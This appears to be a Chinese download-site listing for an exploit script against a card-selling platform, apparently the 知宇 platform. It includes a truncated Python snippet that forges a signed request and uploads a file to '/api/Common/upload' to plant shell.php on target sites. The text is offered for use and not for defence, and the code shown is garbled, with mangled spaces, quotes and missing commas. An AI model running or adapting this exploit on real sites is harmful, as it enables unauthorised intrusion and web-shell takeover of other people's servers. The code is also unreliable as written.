資源簡介
某發卡平臺通殺漏洞利用腳本,執行后會在目標網站上生成shell.php 原理未授權可上傳文件漏洞 + 框架遠程執行函數漏洞 使用時注意看代碼注釋。
代碼片段和文件信息
import?requests
from?requests_toolbelt?import?MultipartEncoder
import?time
import?hashlib
import?re
import?json
requests.packages.urllib3.disable_warnings()
t?=?time.time()
new_time=int(t)
new_str_time=str(new_time)
def?get_path(html):
????re_str=‘/www/(.*?):‘
????x=re.search(re_strhtmlre.S)
????print(html)
????try:
????????return?x.group(1)
????except:
????????return?None
def?exp(url):
????urls?=?url+‘/api/Common/upload‘
????params1?=?“platform=ios&request_time={}“.format(new_str_time)
????new_md5?=?hashlib.md5(params1.encode(encoding=‘UTF-8‘)).hexdigest()
????m=?MultipartEncoder(
????????fields={
????????‘file‘:(‘2.jpg‘open(r“F:\zjx\2.jpg“?‘rb‘)?‘image/jpeg‘)
????????‘platform‘:(‘ios‘)
????????‘request_time‘:(new_str_time)
????????‘sign‘:(new_md5)
?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????文件???????4748??2020-04-09?16:37??發卡通殺\知宇發卡通殺.py
?????目錄??????????0??2020-04-09?16:38??發卡通殺
-----------?---------??----------?-----??----
?????????????????4748????????????????????2
評論
共有 條評論